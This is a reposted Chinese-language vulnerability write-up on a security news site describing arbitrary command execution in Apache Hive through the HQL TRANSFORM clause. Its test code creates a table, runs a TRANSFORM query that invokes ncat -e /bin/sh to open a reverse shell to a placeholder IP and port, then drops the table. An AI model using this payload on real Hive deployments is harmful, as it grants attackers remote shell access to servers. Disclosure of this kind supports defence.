安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > Hive任意命令/代码执行漏洞+渗透实例

Hive任意命令/代码执行漏洞+渗透实例

时间:2019-07-16来源:未知 作者:安云网点击:
hive是基于Hadoop的一个数据仓库工具,可以将结构化的数据文件映射为一张数据库表,并提供简单的sql查询功能,可以将sql语句转换为MapReduce任务进行运行 最近遇到hive,查下了相关漏洞,只发现2013的这篇,做个记录 Author: kindle Dat
//内容来自安云网

hive是基于Hadoop的一个数据仓库工具,可以将结构化的数据文件映射为一张数据库表,并提供简单的sql查询功能,可以将sql语句转换为MapReduce任务进行运行 //内容来自AnYun.ORG

最近遇到hive,查下了相关漏洞,只发现2013的这篇,做个记录 //本文来自安云网


//本文来自安云网

Author: kindle
Date: 2013-02-9

Hive是建立在 Hadoop 上的数据仓库基础构架。它提供了一系列的工具,可以用来进行数据提取转化加载(ETL),这是一种可以存储、查询和分析存储在 Hadoop 中的大规模数据的机制。Hive 定义了简单的类 SQL 查询语言,称为 QL,它允许熟悉 SQL 的用户查询数据。同时,这个语言也允许熟悉 MapReduce 开发者的开发自定义的 mapper 和 reducer 来处理内建的 mapper 和 reducer 无法完成的复杂的分析工作。

漏洞详情

HQL可以通过transform自定义Hive使用的 Map/Reduce 脚本,从而调用shell/python等语言,导致攻击者可以通过hive接口等相关操作方式直接获取服务器权限

测试代码

cat /root/test
1 test

创建测试表
create table if not exists kindle(id int,test string);
通过transform来自定义hive使用的shell命令,反弹shell
select transform(id) USING ‘/usr/bin/ncat -e /bin/sh ip port’ from kindle;
删除测试表
drop table kindle;

 Hive任意命令/代码执行漏洞+渗透实例

漏洞状态

通知了部分大公司,尚未联系官方


本文标题: Hive任意命令/代码执行漏洞+渗透实例 安云网
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容